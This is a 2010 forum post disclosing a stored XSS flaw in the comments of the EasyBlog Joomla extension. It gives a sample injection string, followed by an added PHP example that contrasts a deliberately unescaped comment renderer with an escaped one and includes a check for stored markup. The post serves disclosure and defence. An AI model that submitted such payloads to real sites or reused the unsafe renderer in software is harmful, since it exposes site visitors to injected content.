Joomla.it Forum

Joomla EasyBlog Persistent XSS Vulnerability
vamba, 16 Jul 2010, 14:50:28
Commercial extension
For updates and patches, refer to the vendor's support

Critical Level: HIGH
URL: http://stackideas.com/products/easyblog.html


This vulnerability exists in the comments section.
 
1. Go to any post and submit your evil XSS script in the comment section :P
 
Attack Pattern: ">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
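
A defensive illustration of the flaw class reported above, added here and not part of the original post or of EasyBlog's code: a comment renderer that echoes stored text raw, next to one that encodes it at output time, plus a check for finding comments already stored with markup in them. All function names and the sample rows are hypothetical and constructed for the example.

```php
<?php
// Added example, not EasyBlog code. All names below are hypothetical.

// Vulnerable pattern: the stored comment is concatenated into the page as-is,
// so markup submitted once is parsed by the browser of every later reader.
function render_comment_unsafe(string $author, string $body): string
{
    return '<div class="comment"><b>' . $author . '</b><p>' . $body . '</p></div>';
}

// Encode for the HTML text/attribute context at output time.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: escape first, then add the only markup we intend (<br />).
function render_comment_safe(string $author, string $body): string
{
    return '<div class="comment"><b>' . h($author) . '</b><p>'
         . nl2br(h($body)) . '</p></div>';
}

// Audit helper: flag stored comments that contain something a browser would
// parse as a tag ("<" directly followed by a letter, "/", "!" or "?").
// A plain "a < b" is not flagged.
function comment_contains_markup(string $body): bool
{
    return preg_match('/<\/?[a-zA-Z!?]/', $body) === 1;
}

// Constructed sample rows; row 2 carries the pattern quoted in the post.
$comments = [
    ['id' => 1, 'author' => 'alice', 'body' => "Nice post, thanks!\nSee you."],
    ['id' => 2, 'author' => 'sid',
     'body' => '">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>'],
    ['id' => 3, 'author' => 'bob', 'body' => 'if a < b then swap'],
];

foreach ($comments as $c) {
    $flag = comment_contains_markup($c['body']) ? 'REVIEW' : 'ok';
    echo "#{$c['id']} [{$flag}]\n";
    echo '  unsafe: ' . render_comment_unsafe($c['author'], $c['body']) . "\n";
    echo '  safe:   ' . render_comment_safe($c['author'], $c['body']) . "\n";
}
```

The audit check only finds rows to review after an update; the output encoding is what stops stored markup from being rendered.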